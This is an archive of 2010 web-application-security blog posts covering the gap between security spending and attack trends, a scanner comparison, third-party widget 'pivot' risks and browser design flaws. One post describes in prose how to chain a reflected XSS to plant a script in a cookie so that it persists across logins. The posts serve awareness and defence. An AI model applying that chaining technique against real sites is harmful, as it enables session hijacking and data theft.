Friday, February 19, 2010

Compliance and Habit holding back Application Security

My "Infrastructure vs. Application Security Spending" post must have struck a nerve. I've received a number of comments and emails where it's clear many are grappling with the same organizational budgeting challenges. Sharing these individual experiences help us raise awareness and gain new perspective on things that might work to our advantage. I sought permission to share the content of such insightful email from a Director of Product Security for a large publicly-traded company.

"Good post. It's something I've been preaching at *redacted* since day one. Our business relies on protecting our customers data. Why spend significantly more money on protecting our internal networks then on our product. I've won that battle, but given our security team started from network IT Security guys, that's where the money was spent.


A couple things I thought I'd pass along which you didn't mention, but I'm sure you've though about:

1. Service providers are going to spend money where their customers want them to. If their customer's security teams are all network guys, then the service provider is catering it's "security budget" to those guys. It still befuddles me in this day and age that we get predominantly more nCircle/Qualys/Nessus scans than we do application assessments from our customers. It shows though too in the compliance arena…if the people auditing your company have been baptized by compliance, then the service provider will cater to that. Unfortunately there's way more auditors who look at compliance and network security then application level security.

2. I think the comparison of network/host security vs application security shouldn't equate (right now). Because of the maturity of the market, there are less tools that are practical to rely on. As such, the curve should focus more on people (training, processes, and security staff) then on tools. I'm not saying the tools can't /don't do a good job, I'm just saying that right now they're not sufficient and in general more staffing resources need to be involved. To use an internal example, the fact that all R&D staff at *redacted* go through security training, perform security work every sprint, use secure frameworks, tools, etc, isn't captured by the numbers…and frankly is more valuable than us spending another 100K on a few more licenses of AppScan or WebInspect.


I think it would be really interesting to compare the costs of some of these products vs the benefit they provide. I just find it terribly funny that a Burp license costs ~$200, while running a product like DB Monitoring would costs hundreds of thousands or even millions of dollars in a large data center. That said, customers ask for things like DB Monitoring - because, you know, the five DBAs are more likely to steal their data then the thousands of malicious hackers out there ;-)

I'm not old enough to know…but, I bet the network security guys cracked on how the physical security guys got all the budget way back when. Evolution…"


If you got a story to share, please do!

Best of Application Security (Friday, Feb. 19)

Ten of Application Security industry's coolest, most interesting, important, and entertaining links from the past week -- in no particular order.

Thursday, February 18, 2010

Hey Massachusetts, where is your application security requirement?

This relates to my last post where Boaz Gelbord (Security Scoreboard), cited something very interesting about the Massachusetts data security regulation going into effect March 1. Their listed “Computer System Security Requirements” of their "risk-based approach" is pasted below. While I can’t say any one of these security controls is a bad idea, but can someone please tell me how any of this stuff is going to thwart Web-based attacks!? You know the kind of attack organizations and end-users are really dealing with!

No mention at all of (Web) application security, the thing we desperately need, but sure enough more firewalls, SSL, and anti-malware is legally mandated.


(1) Secure user authentication protocols including:
(a) control of user IDs and other identifiers;
(b) a reasonably secure method of assigning and selecting passwords, or use of unique identifier technologies, such as biometrics or token devices;
(c) control of data security passwords to ensure that such passwords are kept in a location and/or format that does not compromise the security of the data they protect;
(d) restricting access to active users and active user accounts only; and
(e) blocking access to user identification after multiple unsuccessful attempts to gain access or the limitation placed on access for the particular system;
(2) Secure access control measures that:
(a) restrict access to records and files containing personal information to those who need such information to perform their job duties; and
(b) assign unique identifications plus passwords, which are not vendor supplied default passwords, to each person with computer access, that are reasonably designed to maintain the integrity of the security of the access controls;
(3) Encryption of all transmitted records and files containing personal information that will travel across public networks, and encryption of all data containing personal information to be transmitted wirelessly.
(4) Reasonable monitoring of systems, for unauthorized use of or access to personal information;
(5) Encryption of all personal information stored on laptops or other portable devices;
(6) For files containing personal information on a system that is connected to the Internet, there must be reasonably up-to-date firewall protection and operating system security patches, reasonably designed to maintain the integrity of the personal information.
(7) Reasonably up-to-date versions of system security agent software which must include malware protection and reasonably up-to-date patches and virus definitions, or a version of such software that can still be supported with up-to-date patches and virus definitions, and is set to receive the most current security updates on a regular basis.
(8) Education and training of employees on the proper use of the computer security system and the importance of personal information security.

Infrastructure vs. Application Security Spending

A recent study published by 7Safe, UK Security Breach Investigations Report, analyzed 62 cybercrime breach investigation and states that in “86% of all attacks, a weakness in a web interface was exploited” (vs 14% infrastructure) and the attackers were predominately external (80%). These results are largely consistent with the US-based Verizon Data Breach Incident Report (2008) which tracks over 500 cases. Combine this knowledge with the targeted Web-related attacks against Google, Adobe, Yahoo, the US House of Representatives, TechCrunch, Twitter, Heartland Payment Systems, bank after bank, university after university, country after country -- the story is the same. It’s a Web security world.

It has been said before and it’s worth repeating, adding more firewalls, SSL, and the same ol’ anti-malware products is not going to help solve this problem!

The reason that Web security problems persist is not a lack of knowledgeable people (though we could use more), perfected security tools (they could be much better), or effective software development processes (still maturing). A fundamental reason is something myself and others have been harping on for a long while now. Organizations spend their IT security dollars protecting themselves from yesterday’s attacks, at the network/infrastructure layer, while overlooking today’s real threats. Furthermore, these dollars are typically spent counter to how businesses invest their resources in technology. To illustrate this point I’m going to borrow inspiration from Gunnar Peterson (Software Security Architect & CTO at Arctec Group).

Let’s look at the approximate 2009 revenue from the largest corporations supplying a significant (most?) portion of IT infrastructure. Cisco $36B, Juniper $3.3B, Microsoft $58.5B, and F5 $653M. Total: $98.5B (USD). To protect this infrastructure from attacks security products are purchased. The approximate 2009 revenue of largest security vendors is Symantec $6B, Kaspersky $100M, McAfee $1.6B, Checkpoint $800M, SourceFire $75M, and IBM/ISS $500M (we think).

We’re spending $9.1B (USD) to protect $98.5B (USD) in infrastructure. Perhaps a ~%10 security tax on infrastructure is acceptable.

Now, let’s take a look at five of the top Web-based companies, which make all their money online, and by extension whose core technology value is rooted in Web code. In 2009 their revenues were: Google $23.6B, Yahoo $6.5B, eBay $8.7B, Amazon $24.5B, Salesforce.com $1.1B. $64.4B in total. Keep in mind that the 2009 eCommerce market is said to be about $130B. To protect these Web-enabled systems let’s use Gary McGraw’s (CTO of Cigital) 2007 software security revenue numbers of $500 million. He takes into account the bulk of white and black box testing tools, professional services consultancies, and web application firewall vendors. Since Gary hasn’t updated his numbers yet, lets adjust up to $750M to reflect market growth between then and 2009.

So in effect ~$750M is being spent to protect $64.4B in eCommerce revenue.


This is further supported by analyst findings. According to Gartner, 90 percent of IT security spending is on perimeter security such as firewalls. Plus to my mind that 1.20% figure is way aggressive. It is likely the percentage is much lower because the $750M is actually being spread out among financial, healthcare, insurance, education, energy, transportation, and government verticals. Perhaps this is also the reason why so many application security professionals wage holy wars over what solution is the best, worst, most important, or should be purchased first.

For the last ten years, I’ve directly experienced application security professionals fighting amongst themselves for scraps off the Big-Security-Vendor’s table. Vulnerability scanners vs WAFs, black vs white box, pen-test vs source code review, certifications vs real world experience, developer training vs secure frameworks, and so on. FAIL! All these solutions are necessary and more! The only way I see to truly improve application security is for organizations to do one (or both) of the following:
  1. Reallocate a portion of current infrastructure security spend to application security.
  2. Grow overall IT security spending and increase application security to more than a rounding error.
But, lets say you are unconvinced by the numbers above. They might be too shaky, that’s fair. Lets try another Gunnar-inspired exercise:

Break the IT budget into the following categories:

- Network: all the resources invested in Cisco, network admins, etc.
- Host: all the resources invested in Unix, Windows, sys admins, etc.
- Applications: all the resources invested in developers, CRM, ERP, etc.
- Data: all the resources invested in databases, DBAs, etc.

Tally up each layer. If you are like most business you will probably find that you spend most on Applications, then Data, then Host, then Network.

Then do the same exercise for the Information Security budget:

- Network: all the resources invested in network firewalls, firewall admins, etc.
- Host: all the resources invested in Vulnerability management, patching, etc.
- Applications: all the resources invested in static analysis, black box scanning etc.
- Data: all the resources invested in database encryption, database monitoring, etc.

Again, tally each up layer. If you are like most business you will find that you spend most on Network, then Host, then Applications, then Data. Congratulations, Information Security, you are diametrically opposed to the business!


If security spending can be justified on areas where attacks no longer occur, then perhaps we can justify more time, money, and effort on application security in the areas where the attacks are being waged.

Tuesday, February 09, 2010

Where's WhiteHat? Re: Scanner Comparisons

Last week Larry Suto published, “Analyzing the Accuracy and Time Costs of Web Application Security Scanners,” which reviewed desktop black box website vulnerability scanners: Acunetix, IBM AppScan, BurpSuitePro, Cenzic Hailstorm, HP WebInspect, NTOSpider, and Qualys WAS (Software-as-a-Service). This research was meant to build upon Larry’s initial October 2007 study of the market. Several people have asked what I thought of the paper and why WhiteHat Security wasn’t covered. I’m happy to discuss both questions.

First off, the website vulnerability management space is in desperate need of side-by-side comparisons as they are very few and far between. This represents a challenge for organizations building application security programs that want to create a product short-list to evaluate internally. For a variety of reasons, independent and publicly available detailed technical reviews of website vulnerability management products/solutions are unlikely to come from the expected sources, such trade magazines and industry analysts. One of the main inhibitors is that many of these firms do not have a Web application testbed that would allow for an accurate, fair comparison. Thankfully, researchers, such as Larry Suto, help fill the void by investing personal time and sharing their results. Others independents should be encouraged to do the same. I would recommend the “Web Application Security Scanner Evaluation Criteria (WASSEC)” if you wish to do so. Also, Larry confirmed he was not compensated by any vendor for his work.

During the latter stages of Larry’s research, WhiteHat Security was offered the opportunity to be included. In order to take part, we were asked to assess six vendor hosted “test websites” with WhiteHat Sentinel, identify vulnerabilities and report our findings. The testing process was designed to evaluate desktop black box scanner technology using a “Point-and-Shoot” and “Trained” methodology -- something not well-suited for a SaaS offering like Sentinel. What we do and how we do it is very different from the scanning tools, but is still often seen as an alternative. After much consideration, we did not feel that the testing methodology would provide an apples-to-apples evaluation environment for Sentinel. Additionally, and equally important, finding vulnerabilities is only the first piece of the overall value our customers receive, so we politely declined to participate.

*Not to mention, that as a strict rule, we never touch any website without express written authorization.*

The report states, consistent with my expectations, that significant amounts of human/expert time are required for scanner configuration, vulnerability verification, scan monitoring, etc. to enable the aforementioned products to function proficiently. Behind the scenes, Sentinel is no different, except that we perform all of those activities and more for our customers as a standard part of the annual subscription. Doing so means our engineering time has a hard cost to us and staff resources are dedicated to serving customers.

The report confirms that scanner performance varies wildly from site to site, so it’s best to test where they will be deployed. We agree and provide mechanisms for our customers to evaluate Sentinel first-hand for exactly that reason. We want customers to know exactly what they can expect from us on their production systems and not a generic test website. Finally, where Sentinel really excels, is in areas where the report did not (could not) focus. Scalability is one of these. Whether we are tasked with one site, 10, 100, 1,000 or more -- Sentinel is capable of handling the volume.

Over the years I’ve written extensively about black box scanner efficiencies and deficiencies in depth: Automated Scanners vs. Low-Hanging Fruit, Automated Scanner vs. The OWASP Top Ten, shed light on duplication rates, what scanners are good at finding and what they are not -- with a scan-o-meter, discussed business logic flaws, why crawling matters a lot, how much essential human time is required, and even what it takes to make the best scanner. So obviously the scanners overall general poor showing came as no surprise. Most missed nearly half of the vulnerabilities, on test websites no less, where they are designed to be easily found. Imagine how they would perform in the real world! It gets much uglier and dangerous out there I assure you.

I’d highly recommended everyone interested Web application security read Larry’s report for themselves and get familiar with what is the current state-of-the-art in black box scanning products. Much improvement could be made through additional R&D. Remember, keep an open mind, but at the same time take the results with a grain of salt until you test on your systems. Some vendors will say Larry’s work wasn’t perfectly scientific, possessed data errors, was misinterpreted, ran misconfigured, couldn’t reproduce the results, etc. All of that may be true, but so is the fact that it looks like Larry conducted a deeper and fairer analysis than the average would-be user does during typical evaluations.

Here are the three takeaways:
  1. Scanner results will vary wildly from website to website. For best results, I highly recommend that you evaluate them on the sites where they are going to be deployed. Better still, if you know of vulnerabilities in those sites ahead of time, use that information for comparison purposes.
  2. The significant human/expert time required for proper scanner set-up, ongoing configuration, vulnerability verification, etc. must be taken into consideration. Which vulnerabilities you scan for is just as important as how you scan for them. Estimate about 20-40 man-hours per website scanned.
  3. Scanner vendors should take into consideration that Larry Suto is certainly more sophisticated than the average user. So if he couldn’t figure out how to run your tool “properly,” take that as constructive feedback.

Thursday, February 04, 2010

Web 2.0 Pivot Attacks

Any penetration tester would agree that pivot attacks, designed to compromise a secondary host to more effectively attack primary targets, are incredibly powerful. Organizations tend to have difficulty protecting all hosts at all times, which is why proper network segmentation is vital should loss of control occur on any one node. Often it’s easier to compromise a host from behind rather than head on. Case in point, a hacker used a pivot attack to break into Heartland Payment Systems and pilfer 130 million CC#s. A SQL injection exploit was used to get a foothold in a non-payment-network-host leading to the eventual data compromise. Recently I had a thought that pivot attacks exist in a Web 2.0 world as well, they are just not typically viewed that way.

Many websites automatically load in content from remote resources (JavaScript, Flash, more HTML, images, etc.), which are hosted by third-party providers. These resources normally embed advertisements (DoubleClick), traffic counters (StatCounter), user trackers (whos.amung.us), games (Pogo), videos (YouTube), and thousands of other forms of dynamic content. These are often generically called “Web page Widgets,” things Web page might want to include in their pages for their visitors. There are thousands, maybe tens of thousands of these types of providers. Let’s look at some top mainstream media websites to see what widget hostname they include:

TechCrunch
ad.doubleclick.net
ads.undertone.com
altfarm.mediaplex.com
b.scorecardresearch.com
bs.serving-sys.com
button.topsy.com
cdn.undertone.com
edge.quantserve.com
googleads.g.doubleclick.net
img.mediaplex.com
mp.apmebf.com
network.realmedia.com
partner.googleadservices.com
pubads.g.doubleclick.net
s0.2mdn.net
services.crunchboard.com
static.ak.connect.facebook.com
widget.startups.com
www.facebook.com
www.google-analytics.com
www.oracle.com
www.sun.com
www.tumri.net
ytaahg.vo.llnwd.net

NY Times
ad.doubleclick.net
admin.brightcove.com
ads.pointroll.com
at.amgdgt.com
brightcove.vo.llnwd.net
c.brightcove.com
googleads.g.doubleclick.net
graphics8.nytimes.com
load.tubemogul.com
markets.on.nytimes.com
receive.inplay.tubemogul.com
static.inplay.tubemogul.com
timespeople.nytimes.com
video2.nytimes.com
64.191.193.124

Wall Street Journal
ac3.msn.com
ad.doubleclick.net
adsyndication.msn.com
om.dowjoneson.com
online.wsj.com
s.wsj.net
www.marketwatch.com

CNN
ads.cnn.com
b.scorecardresearch.com
edition.cnn.com
i.cdn.turner.com
i.cnn.net
metrics.cnn.com
svcs.cnn.com

USA Today
ad.doubleclick.net
ads.adsonar.com
ads.revsci.net
altfarm.mediaplex.com
b.scorecardresearch.com
content.usatoday.com
gannett.gcion.com
i.usatoday.net
img-cdn.mediaplex.com
img.mediaplex.com
js.revsci.net
media.fastclick.net
mp.apmebf.com
optimized-by.rubiconproject.com
pix04.revsci.net
r1.ace.advertising.com
rd.apmebf.com
tap-cdn.rubiconproject.com
usata1.gcion.com
usatoday1.112.2o7.net

Washington Post
ad.bizo.com
ad.doubleclick.net
ads.adsonar.com
ads.bluelithium.com
ads.revsci.net
altfarm.mediaplex.com
bp.specificclick.net
custom.marketwatch.com
fls.doubleclick.net
js.revsci.net
media.washingtonpost.com
mp.apmebf.com


In a Web security context, these websites essentially allow arbitrary executable code, supplied by the third-party, complete access to the browser DOM and the user’s session information. *Exception being IMG SRC loads* That means they can hijack accounts by stealing authentication cookies; change the news or ask for passwords by altering what the user sees on the screen; redirect users to malware laden websites; force browsers to attack other systems, and more. By including Web widgets from an uncontrolled source on your pages, the third-party’s entire infrastructure must be included as part of the implicit trust model. These dangers have been previously discussed by Tom Stripling where the third-party service provider was assumed to be the potential nefarious source. I think the concern lies a bit deeper, where a malicious Web 2.0 pivot attack comes in.

If a bad guy, APT or a less-skilled adversary, wants to surreptitiously compromise a (relatively) hardened Web presence (or its users), they don’t necessarily need go after the target directly, they could instead go after the aforementioned third-party providers. How many of these third-parties take security as seriously as their customers do? Assumed few, but we really don’t know for certain. Please comment below is you have experiences here to share? How many organizations really check up on the third-party’s security posture or even know enough take this risk into consideration? Again, some do, but very few in my personal experience. The organization might dismiss the concern by saying something like:

"If X gets hacked we'll have bigger problems on our hands."

Important to add is that during a Web 2.0 pivot attack no traffic is directly seen by the primary target, which basically makes it impossible for them to detect/thwart the attack before a compromise. Post third-party compromise, it might be nearly as hard to detect a Web widget code update unless you can somehow monitor the content changes in unexpected ways. This of course assumes the primary target knows how, when, or if the third-party changes the code (rare). Not to mention the inclusion of Web page widgets is almost always beyond the visibility of a security team, because this process is largely managed through marketing / product management (not so much application development) and can easily happen at any time with zero notice.

Pen-testers to my knowledge can’t/don’t use this type of pivot attack because the third-party is usually another organization, unwilling to grant security testing authority, and therefore out of the scope of the engagement. Also important is that in a network pivot attack you may still be limited in what you can do on a host due to network secregation, ACLs etc. but in JavaScript space, you are basically God.

Yes, the HTML 5 sandbox would be really nice to have.

Converting unimplementable Cookie-based XSS to a persistent attack

Update: Related work by Mike Bailey, Cross-subdomain Cookie Attacks: [Screenshot 1 & 2]

If you spend enough time looking for Cross-Site Scripting (XSS) vulnerabilities, you are bound to come across a cookie-based version eventually -- where the script injection is located in the Cookie header. The problem is there’s no good way (in a modern browser) to force a victims browser to send an HTTP request with a modified Cookie value (to include HTML/JS). While the website or Web application is still technically vulnerable to XSS this is usually considered unimplementable since no PoC code can be created and the risk/threat is therefore lowered.

I was having this conversation with Rob Tate, a member of WhiteHat’s Engineering team, who enlightened to something I hadn’t previously considered. Cookie-based XSS can be made very useful after all!

Consider an online bank with an XSS through a username Cookie parameter. After successful login the resulting page would read something like, "Hello ."

Cookie: username=

Setting the Cookie will most likely require another (non-persistent) XSS vulnerability, which as we know is extremely common. By combining these two vulnerabilities, an unimplementable and non-persistent XSS, you could create a persistent XSS scenario.

What the attacker could do is use the non-persistent XSS to inject a data mining JavaScript function into the browser’s Cookie username parameter via document.cookie. Afterwards every time the victim logs-in the JavaScript will execute in the DOM. Now you have an a persistent XSS attack sticking with the browser over multiple sessions.

Wednesday, February 03, 2010

The Web won’t be safe, let alone secure, unless we break it

There are several security issues affecting all major Web browsers that have remained unaddressed for years (probably because the bad guys haven’t leveraged them aggressively enough, but the potential is there). The problem is that the only known ways to fix these issues (adequately) is to “break the Web” -- i.e. negatively impact the usability of a significant and unacceptable percentage of websites. Doing so is a nonstarter for any browser vendor looking to grow market share. The choice is clear for most vendors: Be less secure and adopted, rather than secure and obscure. This is what the choice comes down to. This is a topic deserving of further exploration.

Web security can be divided into two parts, Website security and Web Browser security. Both are equally important. A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website. If either side of these assumptions fails, then there is a problem (the Web is not secure). Attacks targeting browsers, which will be the focus of this post, can be broadly categorized into three distinct vectors:

1) Attacks designed to escape the confines of the browser walls and execute within the desktop operating system below. This is primarily achieved by exploiting memory and file-handling implementation flaws.

2) Behavioral attacks that trick users into doing something, such as downloading and installing malware, thereby harming their machine or encouraging them to reveal sensitive information.

3) Attacks taking advantage of design flaws in the way the Web works. These attacks normally remain within the browser walls and use the victim’s browser as a launch platform for surreptitiously pilfering information from their session or the surrounding network.

After years of massive volumes of CVEs (repository for published vulnerabilities), the browser vendor incumbents (Microsoft, Mozilla, Opera, Google, Apple) have made great strides in addressing vector #1. Some have more work to do than others. This is a good thing, as exploiting unpatched browsers is the primary method for malware propagation such as the so-called drive-by-downloads, legitimate websites hosting malware that infects their visitors. Fortunately “fixing” #1 doesn’t require “breaking the Web,” only updating shoddy code and distributing updates.

Solving #2 is more psychological than technical in nature. The challenge is that people trust computer screens, believe what they see on the Web, and will install anything in order to watch the latest celebrity sex tape or open a personalized e-greeting sent by their “friend.” Attackers prey on this inherent trust, general good nature, and basic human instinct. In response, browsers have provided EV-SSL, Anti-Phishing Toolbars, SSL warning dialogs, password managers, etc. These efforts make important security decisions more visible, harder to get wrong, or remove the decision altogether. Again “fixing” these issues doesn’t require “breaking the Web,” but creating a more intuitive user-interface design.

Addressing #3, with roots dating back to the earliest days of the Web, is another matter entirely. Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Clickjacking, CSS History Stealing, Intranet Hacking, etc. are all good examples. While these weren’t pressing issue before, they are trending in a dangerous direction. We’ve seen outbreaks of Twitter worms, XSS Defacements of government websites, Facebook Clickjacking attacks, sites that disclose which porn sites people visit, several Intranet Hacking proof-of-concept tools, and so on.

Many, including myself, have asked the major browser vendors to do something about the CSS History Hacking, a privacy violation where a malicious website can tell if you’ve been to a certain URL, by disabling access to key DOM APIs. They said doing so would break certain websites and upset Web developers. (Update: See Wladimir's comment below for excellent insight into the true difficulty of solving this problem)

To solve Intranet Hacking, the suggestion was made to deny websites with a non-RFC 1918 IP address the ability to passively instruct a browser to connect to RFC 1918 IP addresses. The response was that it would break certain essential features like corporate Web proxy set-ups and add-ons like Google Desktop.

Fixing Clickjacking would require changing IFRAMES implementation so that they would not be transparent or allowed at all. Doing so would undoubtedly cause major Web breakage, such as no banner advertising or Facebook-style application platforms. So instead we get opt-in X-FRAME-OPTIONS, which basically no one uses at the moment.

Maybe browser tab/session separation is in order. When logged-in to a website in one tab, other tabs wouldn’t have session access thereby limiting the damage XSS, CSRF, and Clickjacking could inflict. But, this solution would probably annoy users and Web developers who really want persistent authentication. Oh, and we really need Web tracking cookies too. Gah!

So here we are, waiting for the other shoe to drop, and bad enough things to happen. Then we’ll get the juice required to fix these problems, by default. The bigger problem is when that time eventually comes we might actually be forced to break the Web to secure it. In the meantime, the community has been lobbying hard for opt-in tools that the proactive crowd can use to protect themselves ahead of time. Fortunately, we are starting to see new technologies like XSSFilter, Content Security Policy, Strict Transport Security, and Origin headers come into view. Maybe this is the future and a look into the security proving ground for the changes we’ll need to make later.

Tuesday, February 02, 2010

Be Ready -- With Answers

Where are most reported security vulnerabilities located? In Web applications. How is malware predominately distributed and end-users infected? By visiting legitimate websites that have been hacked and loaded with drive-by-download browser exploits. What were the main attack vectors used in the Aurora attacks affecting Google, Adobe, Yahoo and many others? Targeted reconnoissance using social networks and Web browser exploits. What type of cyber attack recently targeted 49 US House of Representatives members just after President Obama’s State of the Union Address? Website defacement. Popular blog TechCrunch received similar treatment, twice, and just before Apple’s recent iPad announcement. What was the main attack vector used in the largest credit card breach ever, affecting Heartland Payment Systems? SQL Injection of a Web application.

Let’s also not forget that according to Verizon’s Data Breach Incident Report (DBIR), “SQL injection attacks, cross-site scripting, authentication bypass and exploitation of session variables contributed to nearly half of the cases investigated that involved hacking.”

Obviously today’s threat landscape is focused on the Web, not networks as in years past. We are now seeing larger, more high profile, costly, and embarrassing events with increased regularity. But make no mistake, this is just the beginning of what’s to come. The trends are easy to read. Web attacks will get worse, far worse, and far more common. Sure there have been some lawsuits and fines, but no one has gone out of business, suffered a significant stock drop, or lost their lives as a result of a Web security incident. The fact is everyone can still get their webmail, update their Facebook, post to Twitter, check their online bank account balance, and buy a book on Amazon -- all still relatively safely. Enjoy this moment, the age of application security innocence is nearly over.

Web security, application security, software security, or whatever you want to call it will soon come into its own. It will no longer be acceptable, feasible, or even seriously suggestible to run for cover by simply adding more firewalls and SSL. Things like “the cloud” will help make this fail plain as day. For application security professionals working in this field, struggling to get their concerns taken seriously by the business, rest assured very soon they will be coming to you rather than the other way around. They’ll want answers, nay solutions, and will come with a checkbook in hand ready to make the problem go away. When they come to you with this urgency it will be as result of a serious breach, customer revolt, vendor compromise, exposure of the organization’s crown jewels, etc. Issues that directly affect the bottom-line and the ability to transact business.

It would be nice to proactively head off the coming catastrophes, but unfortunately the information security industry doesn’t really work that way. Businesses have a hard time spending ahead of an incident. Really bad things have to happen before the allocation of resources can be justified. At least, that is how has always worked. So today your job is to prepare -- and have the answers ready when asked. This is how:

1) Make yourself visible
Brand yourself, and/or your team, as the go-to internal expert(s) for “application security.” Regularly share interesting links, summarize interesting white papers, and offer to coordinate workshops for management and development teams so they can get up to speed. If you need content, every Friday I publish a “Best of Application Security” feature on my blog. Of course, continue voicing concerns about present risks, even if it means being ignored and overruled when suggesting proactive application security programs. The side effect is that this will help establish your organizational visibility. And you won’t be ignored for long given the coming threats. These recent blog posts can help hone your arguments: “Budgeting for Web Application Security” and “Overcoming Objections to an Application Security Program.”

2) Have your answers ready
Build your internal step-by-step plan for an application security program. Need help getting started? Look no further than Securosis’s “Web Application Security Program” white paper. Take its guidance and adapt it to your organization’s specific needs. So when its asked for you are not caught flatfooted. Few things say more about a person and a security professional than their readiness, especially in the eyes of management.

3) Engage with the community
OWASP, WASC, SANS, MITRE, etc. pick your group and a project to get involved in. Meet people, ask questions, and help out as best you can. No one can be expected to have all the answers to every Web security question, the knowledge base is far too big, so build up your network of contacts so you can ask peers. Remember, this is a two-way street, you get what you give.